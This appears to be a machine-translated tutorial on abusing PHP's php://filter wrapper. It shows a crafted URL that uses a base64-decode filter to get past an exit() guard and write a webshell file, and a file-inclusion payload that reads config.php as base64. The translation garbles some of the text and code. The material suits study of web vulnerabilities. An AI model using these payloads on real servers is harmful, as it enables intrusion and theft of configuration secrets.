Php: // use of filter in php Vulnerability

1. php: // The description in php.net, http://php.net/manual/zh/wrappers.php.php . Php: // filter is a metadatabase that is designed for filtering applications when data streams are opened. This is very useful for all-in-one file functions, such as readfile (), file (), and file_get_contents (). Other filters are not used before reading data streams. For more details, see the above link. Two basic examples in php.net: <? Php/* This will output all content of www.example.com with uppercase letters */readfile ("php: // filter/read = string. toupper/resource = http://www.example.com "); <? Php/* This will filter out the character "Hello World" through the rot13 filter and write it to example.txt */file_put_contents ("php: // filter/write = string. rot13/resource=example.txt "," Hello World "); in this example, php will first make the Hello World string as a string. rot13 is converted and then written to the file, which is used in Scenario. 2. Use Case A. As mentioned in [technical challenge-2] of heige (worship heige), it is only related to php: // filter. The following code: <? Php $ str = '<? Php exit (\ '74 \ ');?> '. $ _ GET ['C']; $ fname = $ _ GET ['F']; file_put_contents ($ fname, $ str); how to successfully convert phpinfo (); write and execute? You can use the basic knowledge mentioned above to submit the following link: http://127.0.0.1:81/test.php?f=php%3A%2f%2ffilter%2fwrite%3Dconvert.base64-decode%2fresource%3Dwebshell.php&c=dddPD9waHBpbmZvKCk7Pz4 It is worth noting that there are two points: 1). base64_decode () will ignore invalid characters in the string to be decoded <> ?; The base64_decode () function is provided here to ignore the c Function Code 170 ch = base64_reverse_table [ch]; 171 if ((! Strict & ch <0) | ch =-1) {/* a space or some other separator character, we simply skipo ver */www.2cto. com172 continue; 173} else if (ch =-2) {174 efree (result); 175 return NULL; 176} 177 2 ). set <? Php exit ('74 ');?> When invalid characters are removed, the value is a multiple of 4. For example, phpexit74 is removed after the valid characters are removed, and three characters are added. The value is a multiple of 4, that is, the three d at the beginning of the c parameter. For the reason, you can view the base64 encoding principle. B. If the local file contains such code: <? Php include ($ _ GET ['file']); you want to view the config. php content in the same directory as the code. How to view it? http://127.0.0.1:81/test.php?file=php://filter/convert.base64-encode/resource=config.php 3. Reference: http://hi.baidu.com/hi_heige/item/06a5cb12f96f388989a95659http://www.sektioneins.com/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability/index.html<ALIMT > http://php.net/manual/zh/wrappers.php.php </Alsce>